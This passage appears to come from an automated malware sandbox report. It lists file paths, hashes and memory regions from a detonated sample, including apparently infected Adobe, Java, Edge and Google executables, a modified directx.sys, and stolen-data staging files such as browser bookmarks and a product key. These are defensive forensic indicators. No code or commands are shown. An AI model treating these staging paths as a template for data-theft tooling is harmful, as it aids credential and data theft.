SHA512 255176cd1a88dfa2af3838769cc20dc7ad9d969344801f07b9ebb372c12cee3f47f2dba3559f391deab10650875cad245d9724acfa23a42b336bfa96559a5488

C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE

MD5 92dc0a5b61c98ac6ca3c9e09711e0a5d
SHA1 f809f50cfdfbc469561bced921d0bad343a0d7b4
SHA256 3e9da97a7106122245e77f13f3f3cc96c055d732ab841eb848d03ac25401c1bc
SHA512 d9eefb19f82e0786d9be0dbe5e339d25473fb3a09682f40c6d190d4c320cca5556abb72b5d97c6b0da4f8faefdc6d39ac9d0415fdf94ebcc90ecdf2e513c6a31

C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE

MD5 8c753d6448183dea5269445738486e01
SHA1 ebbbdc0022ca7487cd6294714cd3fbcb70923af9
SHA256 473eb551101caeaf2d18f811342e21de323c8dd19ed21011997716871defe997
SHA512 4f6fddefc42455540448eac0b693a4847e21b68467486376a4186776bfe137337733d3075b7b87ed7dac532478dc9afc63883607ec8205df3f155fee64c7a9be

C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE

MD5 4ddc609ae13a777493f3eeda70a81d40
SHA1 8957c390f9b2c136d37190e32bccae3ae671c80a
SHA256 16d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950
SHA512 9d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5

C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe

MD5 5791075058b526842f4601c46abd59f5
SHA1 b2748f7542e2eebcd0353c3720d92bbffad8678f
SHA256 5c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394
SHA512 83e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb

C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE

MD5 9dfcdd1ab508b26917bb2461488d8605
SHA1 4ba6342bcf4942ade05fb12db83da89dc8c56a21
SHA256 ecd5e94da88c653e4c34b6ab325e0aca8824247b290336f75c410caa16381bc5
SHA512 1afc1b95f160333f1ff2fa14b3f22a28ae33850699c6b5498915a8b6bec1cfc40f33cb69583240aa9206bc2ea7ab14e05e071275b836502a92aa8c529fc1b137

C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe

MD5 cce8964848413b49f18a44da9cb0a79b
SHA1 0b7452100d400acebb1c1887542f322a92cbd7ae
SHA256 fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5
SHA512 bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE

MD5 09acdc5bbec5a47e8ae47f4a348541e2
SHA1 658f64967b2a9372c1c0bdd59c6fb2a18301d891
SHA256 1b5c715d71384f043843ea1785a6873a9f39d2daae112ccdeffcd88b10a3a403
SHA512 3867bf98e1a0e253114a98b78b047b0d8282b5abf4aaf836f31cc0e26224e2a1b802c65df9d90dc7696a6dbcb9a8e4b900f1d1299e1b11e36f095ebaf8a2e5b8

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe

MD5 576410de51e63c3b5442540c8fdacbee
SHA1 8de673b679e0fee6e460cbf4f21ab728e41e0973
SHA256 3f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe
SHA512 f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

MD5 3b73078a714bf61d1c19ebc3afc0e454
SHA1 9abeabd74613a2f533e2244c9ee6f967188e4e7e
SHA256 ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29
SHA512 75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe

MD5 322302633e36360a24252f6291cdfc91
SHA1 238ed62353776c646957efefc0174c545c2afa3d
SHA256 31da9632f5d25806b77b617d48da52a14afc574bbe1653120f97705284ea566c
SHA512 5a1f7c44ce7f5036bffc18ebac39e2bf70e6f35fa252617d665b26448f4c4473adfa115467b7e2d9b7068823e448f74410cdcdfef1ac1c09021e051921787373

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE

MD5 39c8a4c2c3984b64b701b85cb724533b
SHA1 c911f4c4070dfe9a35d9adcb7de6e6fb1482ce00
SHA256 888a1dd0033e5d758a4e731e3e55357de866e80d03b1b194375f714e1fd4351d
SHA512 f42ca2962fe60cff1a13dea8b81ff0647b317c785ee4f5159c38487c34d33aecba8478757047d31ab2ee893fbdcb91a21655353456ba6a018fc71b2278db4db2

C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe

MD5 e7a27a45efa530c657f58fda9f3b9f4a
SHA1 6c0d29a8b75574e904ab1c39fc76b39ca8f8e461
SHA256 d6f11401f57293922fb36cd7542ae811ab567a512449e566f83ce0dcef5ff8e5
SHA512 0c37b41f3c075cd89a764d81f751c3a704a19240ad8e4ebab591f399b9b168b920575749e9d24c2a8f0400b9f340ab9fea4db76ff7060d8af00e2b36ac0c4a54

C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe

MD5 e316c67c785d3e39e90341b0bbaac705
SHA1 7ffd89492438a97ad848068cfdaab30c66afca35
SHA256 4fc8b9433b45c2607cbdf3d1c042c3918b854c9db3ade13b5bb2761d28f1c478
SHA512 25ec433c10adc69305de97107463be74d7b4768acca27886498485e8bc2c8b099994e6c1c6c09a7e603816203d6b18e509fb79f24992915eb802f59bcb790090

C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe

MD5 15f4411f1b14234b5bed948ed78fa86e
SHA1 f9775a3d87efb22702d934322ffcda3511b79c17
SHA256 cd6c08078343089d299a30f7bf16555ab349e946892dca1c49c6c0336d27ff0e
SHA512 c44d2e96d6d0264075379066fd5d11ba30a675bb6f6b6279c4ac0d12066975c30c33b69b52457cbed4e35852e8b15b3daad9274d6f957ae0681fb7a6c48a33cb

C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE

MD5 bcd0f32f28d3c2ba8f53d1052d05252d
SHA1 c29b4591df930dabc1a4bd0fa2c0ad91500eafb2
SHA256 bb07d817b8b1b6b4c25e62b6120e51dec10118557d7b6b696ad084a5ba5bfdeb
SHA512 79f407735853f82f46870c52058ceee4d91857a89db14868ee1169abd5c0fd2e3fa1ed230ab90b5f479a9581b88998643d69b0df498defea29e73b0d487f3b10

C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe

MD5 d47ed8961782d9e27f359447fa86c266
SHA1 d37d3f962c8d302b18ec468b4abe94f792f72a3b
SHA256 b1ec065f71cc40f400e006586d370997102860504fd643b235e8ed9f5607262a
SHA512 3e33f2cdf35024868b183449019de9278035e7966b342ba320a6c601b5629792cbb98a19850d4ca80b906c85d10e8503b0193794d1f1efa849fa33d26cff0669

C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE

MD5 3b35b268659965ab93b6ee42f8193395
SHA1 8faefc346e99c9b2488f2414234c9e4740b96d88
SHA256 750824b5f75c91a6c2eeb8c5e60ae28d7a81e323d3762c8652255bfea5cba0bb
SHA512 035259a7598584ddb770db3da4e066b64dc65638501cdd8ff9f8e2646f23b76e3dfffa1fb5ed57c9bd15bb4efa3f7dd33fdc2e769e5cc195c25de0e340eb89ab

C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MI391D~1.EXE

MD5 49139daa5597eaad0979962066bc0d6b
SHA1 530c87363f416a7dce92316c5941ec535029ca98
SHA256 013c02a79be19f930a74cb081f0ba048dfd54d82c236ee3a524f4d5784f67d77
SHA512 b5b636e313281eb1d398c1aec2f973503f4384ffb169fc691a7b340dc4f6f5bc14ba14bc6c242ac65da4469fd610d4fa52d84ed1fb6db0db22fad55974f908e0

memory/3256-250-0x0000000000400000-0x000000000041B000-memory.dmp

C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~1.EXE

MD5 64f984b2f82f24ff3afe653fa78ae2c1
SHA1 33ed1c8686a7ee0ef7efeb3628a814873461f54f
SHA256 a4d51e8cbc9a30dc847c6b0913e1d5a6c1643d0b013b4c93cd1a505ce59ffcf9
SHA512 7aa1eb9630ecb63e70de516f16fb8769cce1f4659b206c80ec284fc061d714aafbebc5ed69cdd971831ed1ee2194a1b55002de45386dcd095919c1fc031780ac

C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~4.EXE

MD5 bb192a81d4fc65ff7517566285a01b66
SHA1 4451fe8fbb725dc44218842350116b989b5be6da
SHA256 5db0dd7e51ffaba7b95c83ba3d897ef4c43b62219a5c36a6fd0dc8ada45be063
SHA512 1d997fa59a86f209a116f26a7c5f756de3dc30844f30457caa4b53cca1225c0a5e734ae4adb69a33d3ab5ce9dc5a7c3980d44768380fc29d5ff834e4ebf21250

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE

MD5 5c78384d8eb1f6cb8cb23d515cfe7c98
SHA1 b732ab6c3fbf2ded8a4d6c8962554d119f59082e
SHA256 9abd7f0aa942ee6b263cdc4b32a4110ddb95e43ad411190f0ea48c0064884564
SHA512 99324af5f8fb70a9d01f97d845a4c6999053d6567ba5b80830a843a1634b02eaf3c0c04ced924cf1b1be9b4d1dbbcb95538385f7f85ad84d3eaaa6dcdebcc8a6

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE

MD5 a5d9eaa7d52bffc494a5f58203c6c1b5
SHA1 97928ba7b61b46a1a77a38445679d040ffca7cc8
SHA256 34b8662d38e7d3d6394fa6c965d943d2c82ea06ba9d7a0af4f8e0571fb5a9c48
SHA512 b6fdc8389bb4d736d608600469be6a4b0452aa3ea082f9a0791022a14c02b8fb7dcd62df133b0518e91283094eaba2be9318316f72d2c4aae6286d3e8686e787

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe

MD5 5119e350591269f44f732b470024bb7c
SHA1 4ccd48e4c6ba6e162d1520760ee3063e93e2c014
SHA256 2b3aa9642b291932ba7f9f3d85221402a9d27078f56ef0e9c6bca633616e3873
SHA512 599b4ec673169d42a348d1117737b4ad4d7539574153df5a5c7689130c9ac5ff5cd00f3c8ec39adf32ff2b56be074081efcabb6456272c649703c3ea6cdaded4

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE

MD5 27543bab17420af611ccc3029db9465a
SHA1 f0f96fd53f9695737a3fa6145bc5a6ce58227966
SHA256 75530dc732f35cc796d19edd11ae6d6f6ef6499ddcf2e57307582b1c5299554c
SHA512 a62c2dd60e1df309ec1bb48ea85184914962ba83766f29d878569549ca20fca68f304f4494702d9e5f09adedc2166e48ee0bc1f4a5d9e245c5490daf15036bea

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE

MD5 11486d1d22eaacf01580e3e650f1da3f
SHA1 a47a721efec08ade8456a6918c3de413a2f8c7a2
SHA256 5e1b1daa9968ca19a58714617b7e691b6b6f34bfacaf0dcf4792c48888b1a5d3
SHA512 5bd54e1c1308e04a769e089ab37bd9236ab97343b486b85a018f2c8ad060503c97e8bc51f911a63f9b96dd734eb7d21e0a5c447951246d972b05fafeef4633da

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE

MD5 eb008f1890fed6dc7d13a25ff9c35724
SHA1 751d3b944f160b1f77c1c8852af25b65ae9d649c
SHA256 a9b7b9155af49d651b092bb1665447059f7a1d0061f88fa320d4f956b9723090
SHA512 9cfe3480f24bf8970ad5773cb9df51d132ee90ada35cbf8ec1222e09a60ae46b2ff4b96862fea19085b1c32f93c47c69f604589fa3f4af17e5d67bef893b6bf1

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe

MD5 6ce350ad38c8f7cbe5dd8fda30d11fa1
SHA1 4f232b8cccd031c25378b4770f85e8038e8655d8
SHA256 06a3bb0bdd2da870bc8dc2c6b760855cea7821273ce59fc0be158149e52915ba
SHA512 4c18a112fec391f443a4ae217ac6d1850e0cfdad4b2d2cbe3f61cb01c0a1400ea6bd5c3ffe0a9978ead50e7f6cfab96ae5090bb9a611f988f1a86ccaa5d4cd4f

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE

MD5 301d7f5daa3b48c83df5f6b35de99982
SHA1 17e68d91f3ec1eabde1451351cc690a1978d2cd4
SHA256 abe398284d90be5e5e78f98654b88664e2e14478f7eb3f55c5fd1c1bcf1bebee
SHA512 4a72a24dec461d116fe8324c651913273ccaa50cb036ccdacb3ae300e417cf4a64aa458869b8d2f3b4c298c59977437d11b241d08b391a481c3226954bba22e4

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE

MD5 41b1e87b538616c6020369134cbce857
SHA1 a255c7fef7ba2fc1a7c45d992270d5af023c5f67
SHA256 08465cc139ee50a7497f8c842f74730d3a8f1a73c0b7caca95e9e6d37d3beed3
SHA512 3a354d3577b45f6736203d5a35a2d1d543da2d1e268cefeffe6bdb723ff63c720ceb2838701144f5fec611470d77649846e0fb4770d6439f321f6b819f03e4db

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE

MD5 5e08d87c074f0f8e3a8e8c76c5bf92ee
SHA1 f52a554a5029fb4749842b2213d4196c95d48561
SHA256 5d548c2cc25d542f2061ed9c8e38bd5ca72bddb37dd17654346cae8a19645714
SHA512 dd98d6fa7d943604914b2e3b27e1f21a95f1fe1feb942dd6956e864da658f4fbd9d1d0cf775e79ceaae6a025aafd4e633763389c37034134bd5245969bec383e

C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE

MD5 7c73e01bd682dc67ef2fbb679be99866
SHA1 ad3834bd9f95f8bf64eb5be0a610427940407117
SHA256 da333c92fdfd2e8092f5b56686b94f713f8fa27ef8f333e7222259ad1eb08f5d
SHA512 b2f3398e486cde482cb6bea18f4e5312fa2db7382ca25cea17bcba5ab1ff0e891d59328bc567641a9da05caca4d7c61dc102289d46e7135f947ce6155e295711

C:\PROGRA~2\Google\Update\DISABL~1.EXE

MD5 3b0e91f9bb6c1f38f7b058c91300e582
SHA1 6e2e650941b1a96bb0bb19ff26a5d304bb09df5f
SHA256 57c993cadf4bf84810cea23a7112c6e260624beaab48d0e4332d3462900fec1d
SHA512 a4fbe28a0135f4632e0a5b6bd775f8d010250b0fbfe223db1fe81d18552a6bc166ebce807853ba02e6a476e9829454805e415ca828a5e043bd1e63dc53599d0f

C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE

MD5 f7c714dbf8e08ca2ed1a2bfb8ca97668
SHA1 cc78bf232157f98b68b8d81327f9f826dabb18ab
SHA256 fc379fda348644fef660a3796861c122aa2dd5498e80279d1279a7ddb259e899
SHA512 28bc04c4df3f632865e68e83d045b3ecd2a263e62853c922b260d0734026e8a1541988fcbf4ddc9cf3aba6863214d6c6eb51f8bbb2586122a7cb01a70f08d16c

C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE

MD5 25e165d6a9c6c0c77ee1f94c9e58754b
SHA1 9b614c1280c75d058508bba2a468f376444b10c1
SHA256 8bbe59987228dd9ab297f9ea34143ea1e926bfb19f3d81c2904ab877f31e1217
SHA512 7d55c7d86ccabb6e9769ebca44764f4d89e221d5756e5c5d211e52c271e3ce222df90bc9938248e2e210d6695f30f6280d929d19ef41c09d3ea31688ae24d4bf

C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE

MD5 e5589ec1e4edb74cc7facdaac2acabfd
SHA1 9b12220318e848ed87bb7604d6f6f5df5dbc6b3f
SHA256 6ce92587a138ec07dac387a294d0bbe8ab629599d1a2868d2afaccea3b245d67
SHA512 f36ab33894681f51b9cec7ea5a738eb081a56bcd7625bdd2f5ef2c084e4beb7378be8f292af3aeae79d9317ba57cc41df89f00aef52e58987bdb2eac3f48171a

C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE

MD5 96a14f39834c93363eebf40ae941242c
SHA1 5a3a676403d4e6ad0a51d0f0e2bbdd636ae5d6fc
SHA256 8ee4aa23eb92c4aba9a46b18ac249a5fa11c5abb7e2c1ca82cd5196401db790a
SHA512 fbf307a8053e9478a52cfdf8e8bad3d7c6664c893458786ae6ee4fffc6fe93006e99a2a60c97fb62dad1addd5247621517f4edee5d9545717c4587a272cef9a2

C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE

MD5 400836f307cf7dbfb469cefd3b0391e7
SHA1 7af3cbb12d3b2d8b5d9553c687c6129d1dd90a10
SHA256 cb5c5abb625a812d47007c75e3855be3f29da527a41cf03730ad5c81f3eb629a
SHA512 aa53cb304478585d6f83b19a6de4a7938ba2570d380a565a56ff5365aed073d5f56b95ad3228eb7d1e7e6110c6172a58b97bd6a5e57e4a8d39e762ed31dc17c8

C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE

MD5 5da33a7b7941c4e76208ee7cddec8e0b
SHA1 cdd2e7b9b0e4be68417d4618e20a8283887c489c
SHA256 531e735e4e8940dfe21e30be0d4179ceaecb57ce431cf63c5044e07048ac1751
SHA512 977aeecfbc693c9d5746fedf08b99e0b0f6fd7b0c7b41ac2b34a832e68a2e6f3c68f38af2e65c87075fcf00c1c6103e34324df45d7da9412cbbeea7e410794b6

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe

MD5 de69c005b0bbb513e946389227183eeb
SHA1 2a64efdcdc71654356f77a5b77da8b840dcc6674
SHA256 ad7b167ab599b6dad7e7f0ad47368643d91885253f95fadf0fadd1f8eb6ee9c7
SHA512 6ca8cec0cf20ee9b8dfe263e48f211b6f1e19e3b4fc0f6e89807f39d3f4e862f0139eb5b35e3133ef60555589ad54406fb11d95845568a5538602f287863b7d7

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe

MD5 6f87ccb8ab73b21c9b8288b812de8efa
SHA1 a709254f843a4cb50eec3bb0a4170ad3e74ea9b3
SHA256 14e7a1f2f930380903ae3c912b4a70fd0a59916315c46874805020fe41215c22
SHA512 619b45b9728880691a88fbfc396c9d34b41d5e349e04d2eb2d18c535fffc079395835af2af7ca69319954a98852d2f9b7891eff91864d63bf25759c156e192ee

C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe

MD5 0511abca39ed6d36fff86a8b6f2266cd
SHA1 bfe55ac898d7a570ec535328b6283a1cdfa33b00
SHA256 76ae68fc7c6c552c4a98c5df640cd96cf27b62e7e1536b7f7d08eff56fcde8b8
SHA512 6608412e3ed0057f387bafcddcb07bfe7da4f207c7300c460e5acc4bd234cec3362191800789eb465eb120ec069e3ed49eabb6bd7db30d9e9245a89bb20e4346

C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE

MD5 cbd96ba6abe7564cb5980502eec0b5f6
SHA1 74e1fe1429cec3e91f55364e5cb8385a64bb0006
SHA256 405b8bd647fa703e233b8b609a18999abe465a8458168f1daf23197bd2ea36aa
SHA512 a551001853f6b93dfbc6cf6a681820af31330a19d5411076ff3dbce90937b3d92173085a15f29ebf56f2ef12a4e86860ac6723ebc89c98ea31ea7a6c7e3d7cdc

C:\Windows\directx.sys

MD5 6fe96f6a53a6d9b852f8ee9d1fb2c18e
SHA1 ed4462c013d4725f46047edf47276e1dd4a9ba21
SHA256 de618075f6d5c13da835cde74593f7dc88d7106ac6f6c0f1017b6142141a00db
SHA512 d53108c6ab377a4abfaf16b50ef63e9b4df3e06c785a573e4851cd18590f9423bdb58cc9e8a51dea854ab02ef2515603b2af048e5490fe4400cf38ba2dc4c9a7

memory/1428-271-0x0000000000B90000-0x0000000000D22000-memory.dmp

memory/3256-272-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3708-273-0x0000000000400000-0x000000000041B000-memory.dmp

memory/876-274-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1428-275-0x0000000005C00000-0x0000000005C92000-memory.dmp

memory/1428-277-0x0000000005A60000-0x0000000005A68000-memory.dmp

memory/1428-276-0x0000000005C90000-0x0000000005CB6000-memory.dmp

memory/3256-278-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3708-279-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1428-281-0x0000000006AF0000-0x0000000006AF8000-memory.dmp

memory/1428-282-0x0000000006B10000-0x0000000006B2E000-memory.dmp

memory/1428-280-0x0000000006AE0000-0x0000000006AEA000-memory.dmp

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\Admin@OBJIYUIE_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/1428-336-0x00000000071A0000-0x0000000007232000-memory.dmp

memory/876-338-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3256-361-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3256-371-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3708-370-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\Admin@OBJIYUIE_en-US\System\Apps.txt

MD5 6b742bb222b7e415b162a1daec985a42
SHA1 8e713a7e049e4ad2abf4c363272da5d6f6095dbd
SHA256 ec84db612ada311823b49c90b64ad3b24335722906fcf3a73015fef3529d5fea
SHA512 9571f4e885604eb810d8ce36fcc458818a234eb0bbd02074d4ab3cf5c69869133868b181c37e8016fb7f559dcda15429412f30561c688376c516124829834562

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\Admin@OBJIYUIE_en-US\System\Process.txt

MD5 6a17211942f81159bc433f8a03e5ac81
SHA1 b063d4044d8e1045da4234f127ce7fa08b27397c
SHA256 e28bda9dcb0ab3c677d58c017ce935f1d3d0403448261c1bb03a4009d0acc26a
SHA512 57ff47e75ef71400ee407b7f1f1755da8662560c86071420afcfa8310b45e5d00afc8862a2ee3e8397e4bd07d5c57fc6003ef85f1f3681c313dec9053618e17c

memory/1428-470-0x0000000006C00000-0x0000000006C7A000-memory.dmp

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\Admin@OBJIYUIE_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\Admin@OBJIYUIE_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\Admin@OBJIYUIE_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/1428-536-0x0000000007000000-0x00000000070B2000-memory.dmp

memory/1428-537-0x0000000007810000-0x0000000007B64000-memory.dmp

memory/2588-539-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-540-0x0000000140000000-0x0000000140848000-memory.dmp

C:\Users\Admin\AppData\Local\e9161ae8c987b8d3373bf0d683de13c6\msgid.dat

MD5 19cfc17e40014f60d3b00c983486ed00
SHA1 20493e6f2fc78c336d3113046a1123045585cedd
SHA256 5fb9f3ec10555c2e6598239a4b922aa128531629bd5d859796f560e5726235cb
SHA512 8e39eeaabce4c28852c2686b51db81233ed6e8fdd39b1e535620816879af00499167bfa3969824b0b5a264b05a5ea4f07487054120dad12d0bc4e0a9732c596e

C:\Windows\directx.sys

MD5 8e966011732995cd7680a1caa974fd57
SHA1 2b22d69074bfa790179858cc700a7cbfd01ca557
SHA256 97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b
SHA512 892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c

memory/4768-553-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2588-555-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-554-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2588-556-0x0000000140000000-0x0000000140848000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-12 01:47

Reported

2024-05-12 01:51

Platform

win10v2004-20240508-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-12 01:47

Reported

2024-05-12 01:51

Platform

win10v2004-20240426-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A